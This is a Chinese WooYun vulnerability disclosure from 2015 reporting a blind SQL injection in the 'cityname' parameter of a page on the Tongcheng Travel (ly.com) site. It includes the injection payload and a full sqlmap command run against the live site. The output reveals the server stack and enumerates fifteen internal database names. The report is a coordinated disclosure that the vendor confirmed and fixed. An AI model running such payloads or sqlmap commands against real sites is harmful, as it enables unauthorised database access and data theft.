当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-097420

漏洞标题:同程旅游网主站某处SQL注入(二)

相关厂商:苏州同程旅游网络科技有限公司

漏洞作者: xhc39

提交时间:2015-02-15 17:53

修复时间:2015-02-16 14:41

公开时间:2015-02-16 14:41

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-15: 细节已通知厂商并且等待厂商处理中
2015-02-15: 厂商已经确认,细节仅向厂商公开
2015-02-16: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

这次真是主站的注入...

详细说明:

http://www.ly.com/dujia/AjaxCallNew.aspx?type=GetNewVisaCountryUrl1&cityname=%E6%97%A5%E6%9C%AC&citytype=314&locality=6&iid=0.9027713068830946 的 cityname参数存在布尔盲注,可跑出数据库。
payload: cityname=%E6%97%A5%E6%9C%AC'%20and%20'1'='1

漏洞证明:

root@kali:~/Desktop/sqlmapdir# sqlmap -u "http://www.ly.com/dujia/AjaxCallNew.aspx?type=GetNewVisaCountryUrl1&cityname=%E6%97%A5%E6%9C%AC&citytype=314&locality=6&iid=0.9027713068830946" -p cityname --prefix "%E6%97%A5%E6%9C%AC'" --suffix "and '1'='1" --delay=3 --technique=B --time-sec=20 --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 16:33:53
[16:33:53] [INFO] testing connection to the target URL
[16:33:57] [INFO] testing if the target URL is stable. This can take a couple of seconds
[16:34:01] [INFO] target URL is stable
[16:34:04] [INFO] testing for SQL injection on GET parameter 'cityname'
[16:34:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:34:13] [INFO] GET parameter 'cityname' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[16:34:35] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'Microsoft SQL Server'
do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n] y
[16:35:08] [INFO] checking if the injection point on GET parameter 'cityname' is a false positive
GET parameter 'cityname' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 15 HTTP(s) requests:
---
Place: GET
Parameter: cityname
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=GetNewVisaCountryUrl1&cityname=%E6%97%A5%E6%9C%AC' AND 4527=4527 and '1'='1&citytype=314&locality=6&iid=0.9027713068830946
---
[16:35:35] [INFO] testing MySQL
[16:35:38] [WARNING] the back-end DBMS is not MySQL
[16:35:38] [INFO] testing Oracle
[16:35:41] [WARNING] the back-end DBMS is not Oracle
[16:35:41] [INFO] testing PostgreSQL
[16:35:44] [WARNING] the back-end DBMS is not PostgreSQL
[16:35:44] [INFO] testing Microsoft SQL Server
[16:35:48] [INFO] confirming Microsoft SQL Server
[16:36:03] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[16:36:03] [INFO] fetching database names
[16:36:03] [INFO] fetching number of databases
[16:36:03] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[16:36:03] [INFO] retrieved:
[16:36:16] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[16:36:16] [ERROR] unable to retrieve the number of databases
[16:36:16] [INFO] retrieved: TCCline
[16:39:37] [INFO] retrieved: master
[16:42:18] [INFO] retrieved: tempdb
[16:44:57] [INFO] retrieved: model
[16:47:17] [INFO] retrieved: msdb
[16:49:11] [INFO] retrieved: 17u_net
[16:52:15] [INFO] retrieved: ipdata
[16:54:51] [INFO] retrieved: TCb2cBlog
[16:58:47] [INFO] retrieved: TCB2cWenDa
[17:03:04] [INFO] retrieved: TCHotelFinance
[17:08:50] [INFO] retrieved: TCCline
[17:11:53] [INFO] retrieved: TCCLineResource
[17:18:07] [INFO] retrieved: TCEbook
[17:21:06] [INFO] retrieved: TCFly
[17:23:26] [INFO] retrieved: TCFlyUtility
[17:28:28] [INFO] retrieved: TCHotel
[17:31:39] [INFO] retrieved:
available databases [15]:
[*] 17u_net
[*] ipdata
[*] master
[*] model
[*] msdb
[*] TCb2cBlog
[*] TCB2cWenDa
[*] TCCline
[*] TCCLineResource
[*] TCEbook
[*] TCFly
[*] TCFlyUtility
[*] TCHotel
[*] TCHotelFinance
[*] tempdb
[17:32:27] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.ly.com'
[*] shutting down at 17:32:27

ly2.jpg

修复方案:

过滤

版权声明:转载请注明来源 xhc39@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-02-15 18:05

厂商回复:

感谢关注同程旅游,晚上给你发红包~

最新状态:

2015-02-16:公开公开